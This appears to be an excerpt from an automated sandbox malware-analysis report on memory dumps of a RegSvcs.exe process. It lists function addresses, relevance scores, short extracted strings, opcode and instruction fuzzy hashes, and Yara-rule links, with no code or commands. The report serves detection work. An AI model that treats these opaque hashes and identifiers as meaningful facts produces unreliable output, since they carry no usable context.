Opcode Fuzzy Hash: 1db7bf09e9f3da89f618cb3e5fbda06b447f6e0f83f8facd7cd02c4e9ba7c948
Instruction Fuzzy Hash: BE210575A017149FC385EB388816AAE3FB2EF81310B84456AE005AB782DF346D06CBD1

Function 064C5CD0 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

Teeq, xrefs: 064C5D1A

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: 6119798113a2c12ca25af7c0b1849e1ddc0676fb579bcac59a9afd057af7f173
Instruction ID: c1ea3e68f69fd691dd756d3ada23e0f2654f5f675ad9705813ae5bffbaa44a2c
Opcode Fuzzy Hash: 6119798113a2c12ca25af7c0b1849e1ddc0676fb579bcac59a9afd057af7f173
Instruction Fuzzy Hash: 1E213574B052548FDB4AA764C9697FF3BB29F89310F11415AD401AB386CE381D07CBE1

Function 064C8800 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

aeq, xrefs: 064C88A0

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: aeq
API String ID: 0-4159377277
Opcode ID: 83148e5df9b63ee2c9329ea75427f34a69dc07d2591f01548f98a4d93b4568bf
Instruction ID: 97e3c4251dcf044f9a057a298ae704f93e330c65b0248b8355aea18002b4b751
Opcode Fuzzy Hash: 83148e5df9b63ee2c9329ea75427f34a69dc07d2591f01548f98a4d93b4568bf
Instruction Fuzzy Hash: 9211E271F006288FC784EB29D416A6E7FB2EBC4720F508629E406AB784DF305D02CBC1

Function 064C5D00 Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

Teeq, xrefs: 064C5D1A

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Teeq
API String ID: 0-348098666
Opcode ID: c51f4f759d67a4da6d674700a58f306ad81c1e815c3cf6c7f906006b63e9bd34
Instruction ID: 19fd57e0beda4e7c680619f9354110a1421f53e657f25c8c4b13ff57891604cc
Opcode Fuzzy Hash: c51f4f759d67a4da6d674700a58f306ad81c1e815c3cf6c7f906006b63e9bd34
Instruction Fuzzy Hash: EC018030B502289BDB59EB68C569BBF7BB2ABC8710F204529D401AB784CF746D42CBD5

Function 064C8847 Relevance: 1.3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

Strings

aeq, xrefs: 064C88A0

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: aeq
API String ID: 0-4159377277
Opcode ID: 0edea81344143d45e0606c82302da02faddfb95c1d97026d11d6701d7a04aa01
Instruction ID: e8c72111847fda14e26142b6c92b8297f95b5d065e9a5c3246201aa4e844a152
Opcode Fuzzy Hash: 0edea81344143d45e0606c82302da02faddfb95c1d97026d11d6701d7a04aa01
Instruction Fuzzy Hash: 43F0C274B006249BC795AB39D852A6E3BA2EBC0721F804A1DE5066F7C5DF706E46C7C1

Function 00E908A8 Relevance: 1.3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

Strings

LO, xrefs: 00E908B1

Memory Dump Source

Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd

Similarity

API ID:
String ID: LO
API String ID: 0-3966099685
Opcode ID: 98eb42670ed8aa71328491bfe8873afe3d74f9c055e447d56f365220f2667d65
Instruction ID: 03a5508a83d084694c39183d8bae1fa819b5ab1644343b3d946c8a16e43f7aed
Opcode Fuzzy Hash: 98eb42670ed8aa71328491bfe8873afe3d74f9c055e447d56f365220f2667d65
Instruction Fuzzy Hash: B2D012B0B0010CEFCB00DFF5E94155DB7B9DB45200B1055A9D408E7241EB315F089B40

Function 064C3752 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9de0aa0c063f3113393970e7f753f8f932af4fbe7f148769e718020ef94d291
Instruction ID: 9921a87f7f94cbfd1938e781c29c41b39680c95cb098f49ce8d31e46699ac800
Opcode Fuzzy Hash: e9de0aa0c063f3113393970e7f753f8f932af4fbe7f148769e718020ef94d291
Instruction Fuzzy Hash: 9291EA38A00105DFCB95CFA9C594A6EBBB2BF89314F24856ED406AB361DB31ED42CF50

Function 064C4408 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12b8ac74e7dc82ad607cf93f871d5428dcf29938c23fb15f6f0b657fc6a17c6b
Instruction ID: 6772a35251b76395486217ebe1586fd0816aeb058ddf0ec6fdcbbdd091a85faf
Opcode Fuzzy Hash: 12b8ac74e7dc82ad607cf93f871d5428dcf29938c23fb15f6f0b657fc6a17c6b
Instruction Fuzzy Hash: D841CD70B002089FCB45EF68D4949AEBBF6FF85314B208569E4099B396DB31AD06CB90

Function 064C38BA Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2dd1606cc34ae658ee538008f241a454aac96e17dd7f7ed291cca92d9df2fc1
Instruction ID: f260ce91f2fad83a3df2606fa037905c600c8dfe05ee0bc0faad23be5848d171
Opcode Fuzzy Hash: f2dd1606cc34ae658ee538008f241a454aac96e17dd7f7ed291cca92d9df2fc1
Instruction Fuzzy Hash: 0D413F34A04208CFDB96DFA9C584B5DBBB2BF44314F24856ED405AB356DB35AD42CF50

Function 064C6961 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 276e1e2e07f60fc5cfaaa8d4817fd291398526698637a43f36c4a02fb3ab5989
Instruction ID: e9a3ae41a042553f9448f0a6f246c7a1656eca0b7d0748038b0775a1fc8f8b3d
Opcode Fuzzy Hash: 276e1e2e07f60fc5cfaaa8d4817fd291398526698637a43f36c4a02fb3ab5989
Instruction Fuzzy Hash: F72103759053809FC796CF64D8809ABBFB0EF42314F09859FE494DB392D234AA06CB90

Function 00E90908 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e16cbe72499f0ef1a19a5741ab16d27f0e91e704147b843fd3441b5cb1a7ea9
Instruction ID: b096a68f7b18a9f64df95390b4703b2f428092868b933b19c3b6c76f7fa3d5da
Opcode Fuzzy Hash: 4e16cbe72499f0ef1a19a5741ab16d27f0e91e704147b843fd3441b5cb1a7ea9
Instruction Fuzzy Hash: 6711C2357002104FDB14EB7AE894A6E7BD6FFC4B64B448469E509DB3A5EE70DC018B90

Function 064C3DF0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66b98a0160fd576b41827a4bf352764c4efc6445a4f98c39084ee37c24543e62
Instruction ID: 1a067a580628b5c37bf0a196073e902a09cecad13c4a9d1a734c12c7f6a5e21d
Opcode Fuzzy Hash: 66b98a0160fd576b41827a4bf352764c4efc6445a4f98c39084ee37c24543e62
Instruction Fuzzy Hash: 0E210434600A008FC765DF19D584E52FBE5EF88324F45CA6EE45A8BBA2C770EC85CB80

Function 064C3EC0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2387907f1db89319af54fd8ba604dbf6456bab155f35fc5e483a871c1771b39
Instruction ID: ff9b279cbfce643f56f2393829cc71461dd05d981bb26a13a5d4d1312ba65842
Opcode Fuzzy Hash: e2387907f1db89319af54fd8ba604dbf6456bab155f35fc5e483a871c1771b39
Instruction Fuzzy Hash: B71154753042409FD7A6DF29D848A53BBF5EB89324B1489AEE449C7352D731E846C750

Function 064C2F57 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54f1dad4002025bd62e960c372fd33994c8b7f99a4476e1b504fe969e2623d0
Instruction ID: ef5c4fd995890c7993116cfb47708c77fdad67efbc89d6a8ceb601c9054e616b
Opcode Fuzzy Hash: d54f1dad4002025bd62e960c372fd33994c8b7f99a4476e1b504fe969e2623d0
Instruction Fuzzy Hash: EF11A1357042018FC710CB29D89497AFBE6EF8A220B18459EF589DB352D671EC05CB50

Function 064C2F68 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ae96a1fa6808697353475786ccdeca4bf863a6e6a9a730ad7a00c5a435d2b2
Instruction ID: ba52624195d062d6c3d8147cbe0f81efd7b1e082b8e08df06965f2c18ff3d4cb
Opcode Fuzzy Hash: 19ae96a1fa6808697353475786ccdeca4bf863a6e6a9a730ad7a00c5a435d2b2
Instruction Fuzzy Hash: AD014F797002058FD750CB69D88892BBBE6EFCD265B14446AF549DB351DA71EC018B50

Function 00E3D809 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3292161627.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e3d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268825fb880e06314bcd13da9a32e8d55b68a11053481e674416b66d5150c65d
Instruction ID: 011b67af03eae868b89cda39dd3eab5f216db0f743fe97915d5d8aaa5ef86756
Opcode Fuzzy Hash: 268825fb880e06314bcd13da9a32e8d55b68a11053481e674416b66d5150c65d
Instruction Fuzzy Hash: C5012B7100D3009AE7159A1AECC8766BFA8DF41374F18C41AED086B186C335B840C6B1

Function 064C9200 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78cba87f2987860b7aebcca6911a4005e1e34d4969a0a023c74b54f18999e029
Instruction ID: d11dd4db5248c27b42f39ccf9d9e3f877a65c506ea1f6091c7e0261c23aa2353
Opcode Fuzzy Hash: 78cba87f2987860b7aebcca6911a4005e1e34d4969a0a023c74b54f18999e029
Instruction Fuzzy Hash: BA1103B58003498FCB60DFAAC884BDEBBF4EB48324F20841AD519A7350C775A944CFA1

Function 064C9202 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81657c3747c7e45f85b9bfd7dacba45943fda2d0f4c902b8d0fa2de547ca1aa9
Instruction ID: 638606b04539d8bf20e8539d8e297ff465f9686d4d578a3444cccf9c365a11e0
Opcode Fuzzy Hash: 81657c3747c7e45f85b9bfd7dacba45943fda2d0f4c902b8d0fa2de547ca1aa9
Instruction Fuzzy Hash: 6E1115B58002498FCB60CFA9D884BDEBBF4EF48324F20841AD419A7350C735A944CFA1

Function 00E3D808 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3292161627.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e3d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 764e8bd628e85624bee169b8a723292f52aba2bd70506788d2c2dda337d927a9
Instruction ID: c3b13b67657b3635d2b232fa9320c36aec282283237f30a2f853bf656ad3701a
Opcode Fuzzy Hash: 764e8bd628e85624bee169b8a723292f52aba2bd70506788d2c2dda337d927a9
Instruction Fuzzy Hash: CBF0C8714043409EE7148A16DDC8762FF98EF51774F14C05AED085B286C375A840CA71

Function 064C6D15 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b0a17490c3f3671429bc4ea5822472a0d61d42cf4e6a67fb9ab136c3a43786b
Instruction ID: 7462c3f45e1cf1c9c1fd64f808d44bcf16a0f800c7195b239d8b10812216ab14
Opcode Fuzzy Hash: 0b0a17490c3f3671429bc4ea5822472a0d61d42cf4e6a67fb9ab136c3a43786b
Instruction Fuzzy Hash: 5BF0E2639192848FCB439BB4CA1039E7F629F46614F1905EBC449CF363D9254A52C792

Function 064C92C8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4bcadf187107c3615c447b9e88a50db450581987782d9757835f42c2185476a
Instruction ID: 966463f2ea0e655db158ba8f9556cf5529813fd32aa4988168ec95ba527851d3
Opcode Fuzzy Hash: d4bcadf187107c3615c447b9e88a50db450581987782d9757835f42c2185476a
Instruction Fuzzy Hash: D9E0C23110A3A02F9709DA14CC058B27B69EBC6510316888FF880872829A62AC0B83B1

Function 064C7F09 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dfd2cf4ba3cbca01f46acb7cfd42a0d81c76d29f605f508a8540229fab641c3
Instruction ID: 8f8598a5bcec574107b410a5b80a926e77b7e6928f591d9dddc16b7c3449d208
Opcode Fuzzy Hash: 3dfd2cf4ba3cbca01f46acb7cfd42a0d81c76d29f605f508a8540229fab641c3
Instruction Fuzzy Hash: 86E086316086108FC701EB18DC519D6B771EF87200714C58EE8499F257D631ED4FC7A2

Function 064C8570 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59858c989ffe8238fcc12220139ae0afcbce3b153e833eefc1fb813a1372ef68
Instruction ID: 4f6d55563d1c2d5e6c7b8f6fcb99c4a848e2c5cd603240536fec2922839a3080
Opcode Fuzzy Hash: 59858c989ffe8238fcc12220139ae0afcbce3b153e833eefc1fb813a1372ef68
Instruction Fuzzy Hash: B2E0123A10D2405FD216CE94FD11CD6BBA1DB86A51B14444EF484A7293C5269D17CB72

Function 064C8539 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a92c1129a82dd23bceea4ff4238993b52ccd1b39b68a2808eb417a43508c641b
Instruction ID: ce7861be228c8749b54f151964eab6400eea4c99ba37a4dbd7b5c224d815cbe5
Opcode Fuzzy Hash: a92c1129a82dd23bceea4ff4238993b52ccd1b39b68a2808eb417a43508c641b
Instruction Fuzzy Hash: D0E0863190A3449FC706CBF4CA4189A7FB0DE8620071405EBD144D7152E9301F149761

Function 064C6700 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b813f7b7523912098ff9a65a35ca6f7729d4a1a08bc5626df40ddd642a132485
Instruction ID: 87a3480e2c190663dda371902d0d4e20dab3216bae43d30207e973c52d95b064
Opcode Fuzzy Hash: b813f7b7523912098ff9a65a35ca6f7729d4a1a08bc5626df40ddd642a132485
Instruction Fuzzy Hash: 67D017722193A05FD706CB10E861892BB61EF86600B48888AE491CB293CA25AC17CBA1

Function 064C7529 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7516c106e3ec68427c0666b80a9a923423f63f3945a78a8c8b15fc48c18c9f
Instruction ID: 53f18f6b1577cba9a11233db44fa003a4eef3c1394fe0f6266541cc38f4389e5
Opcode Fuzzy Hash: 3d7516c106e3ec68427c0666b80a9a923423f63f3945a78a8c8b15fc48c18c9f
Instruction Fuzzy Hash: 50E0EC7510C2919FC342CB54E950856BBE5AF86610B18888EE480DB293C625DD16DB72

Function 064C6880 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0795dc6c7c7f98fe73da79d2adedcf90536b717d6348c65ec6aa55c7adb26c
Instruction ID: 8a0611a3b9dfc2454b8582137016116d3f141532e4e640094ea520ca6335e932
Opcode Fuzzy Hash: 9a0795dc6c7c7f98fe73da79d2adedcf90536b717d6348c65ec6aa55c7adb26c
Instruction Fuzzy Hash: 95E0EC7610C2909FC702CB94E960856FFA29F8A604B2884CAE5849B253C522DC17D732

Function 064C4A28 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 564cd8dff0bd627208d61efa8c5063f24ab9947c1aa91de93e2d453745d80b62
Instruction ID: 093abebbb195f7e2b4f65393a1a67ab67f97abf3cbcd8990683a401e2e4fc0a7
Opcode Fuzzy Hash: 564cd8dff0bd627208d61efa8c5063f24ab9947c1aa91de93e2d453745d80b62
Instruction Fuzzy Hash: F8D05E341092906FE341DB68E840966BFA5EBC9210F04C84EF84047202CB629C0BC751

Function 064C5EF9 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e441ad4cc31010be5098a900334a55aa74fac49aca341ee51d802992effabfcb
Instruction ID: 5f6a18f918fd7c9835777f8f139183cfd94df01f974fcf99424d4511c12a0d53
Opcode Fuzzy Hash: e441ad4cc31010be5098a900334a55aa74fac49aca341ee51d802992effabfcb
Instruction Fuzzy Hash: B9D05EB614A2419FD305DF44E944C26BBB2EBE9700F05848FF48457356CA23DC16C772

Function 064C8AD0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac377d768f0b7357f62e78f748e15e1511fcc741df9c0182460ef95579817975
Instruction ID: 11abcdd3c22566896d5b0b8de4f9750033ea0e9fd9dfb5f7d30baca573b166b9
Opcode Fuzzy Hash: ac377d768f0b7357f62e78f748e15e1511fcc741df9c0182460ef95579817975
Instruction Fuzzy Hash: F0D0A77110D2805FC305CB60C861412BF709F8621471DC0CEE484CB393CA26DD03C710

Function 064C48F8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f65b94791e37c0402ab7b68d200ecce46341ce7e1acf16b1d06e35ac9e1823
Instruction ID: 1b064229508d729c546771aa64ac27596ee313de4d1930b66724fd501a7efe7e
Opcode Fuzzy Hash: 18f65b94791e37c0402ab7b68d200ecce46341ce7e1acf16b1d06e35ac9e1823
Instruction Fuzzy Hash: 50D05E701092905BD381DB68E810967BFA5EBDA214F04C89EE89047303CBA29C1AC751

Function 064C4628 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f776f71014b6761ddf3ea51eb305d6dacd2f281a26d6eea0a81405db20ba419
Instruction ID: ca216478d44a8629dc01eebb4d5bb53b5a1854befc872307fb7574cab1dfac32
Opcode Fuzzy Hash: 9f776f71014b6761ddf3ea51eb305d6dacd2f281a26d6eea0a81405db20ba419
Instruction Fuzzy Hash: 46D0A7351083809FC240DB44E841957BB71F7C4314F15C80EE89047352C732D817CB51

Function 064C8548 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b72891d7e391cf300190b667c44cf31f5702c90898d337a9056d2c92522d3c
Instruction ID: d052a7492e61c29d24d5f33bf03d19306e1e4a2334fc444f845286f2a7c1afce
Opcode Fuzzy Hash: 94b72891d7e391cf300190b667c44cf31f5702c90898d337a9056d2c92522d3c
Instruction Fuzzy Hash: A5D0C972D0120CEB8B01DFE9894189EBBF9DB89210B5045E69909D7611EA315E109B91

Function 064C55D0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59148ecb3f1729fde51cd9dbd04ed22df6ff9b53b0a1e49f680c9615aefaa560
Instruction ID: 3de54fa7e6629833f877eb363c92743f270e90b57a83edfd841e34fd3601aabb
Opcode Fuzzy Hash: 59148ecb3f1729fde51cd9dbd04ed22df6ff9b53b0a1e49f680c9615aefaa560
Instruction Fuzzy Hash: A1D012240062405FE7058710CC565D3BB65EA4360035640CBE4408F197CA266D1BC661

Function 064C6890 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2

Function 064C90B1 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dde53d936b9a944b22a83f1b7c2a4e7ae0c926e502e44fc677501809894891c
Instruction ID: 87021df74f0c2010d1aef690799a9e57f7101ae26e9bb029d46001f0e5a4b57b
Opcode Fuzzy Hash: 1dde53d936b9a944b22a83f1b7c2a4e7ae0c926e502e44fc677501809894891c
Instruction Fuzzy Hash: 29C04C2014A2905FC646CB20CC55861BF71DB8251931A85CAE4468F1A3CF16DE17D761

Function 064C8580 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3335735196.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_64c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2

Function 00E90880 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3293019451.0000000000E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_e90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4e9146ac7ff0a0b315f896bb90d1da02f891ac9e45f21e010e4198281e7def5
Instruction ID: dfa1600462592a2be13b5db4c92674e29a8f316d7bc1c1e0e9a65b8d758bcb63
